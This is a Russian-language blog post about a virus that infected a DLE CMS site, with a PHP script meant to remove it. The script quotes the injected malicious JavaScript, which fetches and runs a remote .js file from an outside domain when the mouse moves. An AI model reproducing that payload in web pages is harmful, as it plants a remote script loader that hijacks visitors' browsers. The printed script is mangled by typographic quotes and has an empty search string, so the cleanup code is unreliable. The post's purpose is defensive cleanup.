Вирус на CMS DLE

Рубрика: Из Жизни

Кто пользуется CMS DLE,прекрасно знают что эти система управления очень популярна,и подвержена множеству атак со стороны хакеров.Так же она прекрасно атакуется различными вирусами,что не есть хорошо.Недавно мой знакомый подхватил вирус,из-за небрежного обращения с FTP клиентами,через которые вирус и проскочил.Вылавливали мы его достаточно долго,так как он успел заразить много файлов в системе.Но слава богу нашли в сети скрипт,который это все дело лечит.Скрипт нужно сохранить,и дать ему любое название,так же нужно скрипт положить в корень сайта,и запустить.Ниже вылаживаю сам скрипт.Его можно создать посредством Dreamweaver или Notepad++

php
define (‘BR’, »
\r\n»);
$srch=»;
$srch2=»document.write(»);var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function()

{if (flag === 0) {flag = 1;x.getScript(‘http://firefoxstabs.com/’ + Math.random().toString().substring(3) + ‘.js’,

function() {flag = 2;});}});});»;

function clean_file($file)
{
global $srch;
global $srch2;
$basename=basename($file);
$filename=substr($basename, 0, strrpos($basename, ‘.’));
//print($file.BR);

$f_in=file_get_contents($file);
if (strpos($f_in, $srch)!=false) {

print(«».$file.»
«);
$f_in=str_replace($srch, », $f_in);
file_put_contents($file, $f_in);
}
if (strpos($f_in, $srch2)!=false) {

print(«».$file.» «);

$f_in=str_replace($srch2, », $f_in);
file_put_contents($file, $f_in);
}

}

function firefoxtabs_remover($dir){
if ($objs = glob($dir.»/*»)) {
foreach($objs as $obj) {
if (is_dir($obj)) firefoxtabs_remover($obj);
else clean_file($obj);
}
}
}

$dir=realpath(‘./’);
firefoxtabs_remover($dir);
?>

Вот так выглядит сам скрипт,после запуска он должен полечить все зараженные файлы,и ваш сайт снова начнет нормально работать.

Если Вам интересна эта запись, Вы можете следить за ее обсуждением, подписавшись на RSS 2.0 .

Оставить комментарий или два